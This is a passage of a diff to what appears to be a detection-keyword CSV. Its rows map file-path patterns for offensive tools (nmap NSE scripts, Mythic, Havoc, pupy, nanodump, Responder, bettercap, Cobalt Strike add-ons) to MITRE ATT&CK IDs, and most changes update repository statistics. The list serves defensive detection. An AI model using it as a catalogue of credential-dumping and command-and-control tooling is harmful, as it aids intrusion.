tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4395,7 +4429,7 @@ "*/mtrace.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/MultiPotato.git*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*/murmur-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/mushishi.h*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/mushishi.h*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/mysql-audit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4409,27 +4443,28 @@ "*/mysql-vuln-cve2012-2122.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mystikal.git*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" "*/mystikal.py*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*/Mythic/mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/Mythic_CLI*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/MythicAgents/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/MythicC2Profiles/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/MythicConfig.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/mythic-react-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*/Mythic/mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/Mythic_CLI*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/MythicAgents/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/MythicAgents/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/MythicC2Profiles/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/mythic-cli*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/MythicConfig.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/mythic-react-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*/mzet-/les-res*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/n1nj4sec/pupy*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/n1nj4sec/pupy*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*/nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*/nanodump.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/nanodump.*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/nanodump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/nanorobeus.git*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*/nanorubeus/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/Native/SigFlip/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/nanorubeus/*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Native/SigFlip/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/nat-pmp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nat-pmp-mapport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbns-interfaces.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nbstat.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/NBTNS.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/NBTNS.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/nccgroup/nccfsas/*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/ncp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ncp-serverinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -4437,36 +4472,37 @@ "*/ncrack.git*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" "*/ndmp-fs-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ndmp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ndp_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*/ndp_spoof*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*/Needle_Sift_BOF/*","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 